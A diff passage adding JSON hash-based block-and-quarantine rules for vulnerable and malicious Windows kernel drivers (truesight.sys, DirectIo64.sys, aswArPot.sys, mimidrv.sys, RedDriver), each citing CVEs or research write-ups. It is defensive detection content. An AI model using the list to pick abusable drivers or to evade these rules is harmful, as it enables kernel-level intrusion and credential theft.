+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d3d62e1-49f9-57b4-add9-46f50b745586",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459709Z",
+ "creation_date": "2026-03-23T11:45:30.459712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "554bf34bde5e7c86fc463496d19a4369d911ccad90e3c684855192cd677641c4",
+ "comment": "Vulnerable Kernel Driver (aka viragt.sys) [https://www.loldrivers.io/drivers/39742f99-2180-46d7-8538-56667c935cc3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d446710-8318-5ef1-acfe-6fb7e8565124",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821316Z",
+ "creation_date": "2026-03-23T11:45:31.821320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "820022d1438b3b41578a556cc16c149f11c06bbee4dd31ef605cbec0fe7e4618",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d4e49cb-7181-5830-b4ce-f76303ae36e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986119Z",
+ "creation_date": "2026-03-23T11:45:29.986121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "625fce937dd4fed61bc3a0475e10b6f05d9061c99b5335bf3f33dc43511300b3",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d56f6b5-c75e-5eaa-84de-a251561e8e81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495133Z",
+ "creation_date": "2026-03-23T11:45:31.495135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d2298b33a526068d60e9964778cdf7b0467e0c272c89e7f647f91df04cfb2aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d637982-ac56-5c8a-80dd-83cb4f8eb2b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967206Z",
+ "creation_date": "2026-03-23T11:45:29.967210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb6f186c9bf73b0efd227d99e09659c321f0414bda568e99ee9a3863dc1a380d",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d6d53ac-8ed7-5ee2-90be-009239ee6e14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154996Z",
+ "creation_date": "2026-03-23T11:45:31.154998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b08e1ce175b043fe35518554c6e9d9645cd4f454a76bd38303a0237de73e86c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d6eb45d-59bd-568f-8eb7-991a4f20b2cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622633Z",
+ "creation_date": "2026-03-23T11:45:29.622635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "673b63b67345773cd6d66f6adcf2c753e2d949232bff818d5bb6e05786538d92",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d792f90-9a2e-5c69-bbb8-21d368b944b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150374Z",
+ "creation_date": "2026-03-23T11:45:31.150376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e659535a0d408d81ffffe237c17a21f30def814136bdf391fe73564fb131a8ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d7f8b5d-903e-5bb7-bd8b-a92a48371f50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829911Z",
+ "creation_date": "2026-03-23T11:45:31.829913Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "001a03bdec4bf659f732b2d858e1a70b40446a455bc37d8d4e5c935f3ef32358",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d802545-1d7d-5510-b8f6-4f599ee02042",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969309Z",
+ "creation_date": "2026-03-23T11:45:29.969311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5c4ff35eaa74ccdb80c7197d3d113c9cd38561070f2aa69c0affe8ed84a77c9",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d81ec6a-22df-583d-bcc7-192b72381ac7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615290Z",
+ "creation_date": "2026-03-23T11:45:29.615292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f210a62de46c5acb868a083465b94287331ec28acd3b269e64ab6c3f372021f",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d89e9ac-f887-5d1e-8ea8-1e840349ff2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613136Z",
+ "creation_date": "2026-03-23T11:45:29.613138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdcacee3695583a0ca38b9a786b9f7334bf2a9a3387e4069c8e6ca378b2791d0",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1da640c3-dab8-593b-8091-43be9689d8bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159652Z",
+ "creation_date": "2026-03-23T11:45:31.159655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68ae2bd91421eb9fac0412e392af4b7f9ce1cc077cb069d904db243e7d8d7e66",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1daf158f-dd39-59b9-82e8-595b279f79eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968239Z",
+ "creation_date": "2026-03-23T11:45:29.968241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16768203a471a19ebb541c942f45716e9f432985abbfbe6b4b7d61a798cea354",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1db55043-ae03-5402-86d7-146f720264cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154041Z",
+ "creation_date": "2026-03-23T11:45:31.154043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da7fc3aa13917d1d9dddae0f0353fdc5423a281a6c41cb12d7aec62e9128fad6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dc54178-c0d3-5514-9f4b-7d6d243fcb8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620548Z",
+ "creation_date": "2026-03-23T11:45:29.620550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dcf377a-baaa-5b5b-bd83-d7b93f7a0526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983404Z",
+ "creation_date": "2026-03-23T11:45:29.983406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dd5449d-5ab1-5fd0-95ae-859a0adf3e7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820859Z",
+ "creation_date": "2026-03-23T11:45:30.820861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03680068ec41bbe725e1ed2042b63b82391f792e8e21e45dc114618641611d5d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dd5ca46-cc64-5208-a6f9-a446d9fb49c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467736Z",
+ "creation_date": "2026-03-23T11:45:30.467739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91e64a75caa5015cb1d874372e4fdfefa506de680a962fdd97b83206bdf1e27e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dd8b129-2f9f-5617-81f5-00ad709be9db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466523Z",
+ "creation_date": "2026-03-23T11:45:30.466526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dd9e8f4-f2bc-5813-9ccc-8d07c6179b05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463728Z",
+ "creation_date": "2026-03-23T11:45:30.463732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dddbd04-2ce2-5a83-9c9a-d0ee7c989db9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833452Z",
+ "creation_date": "2026-03-23T11:45:30.833455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12dd733db66f745c5401a0470343f165767a6381b6789e45ceef1ab4c6e33983",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
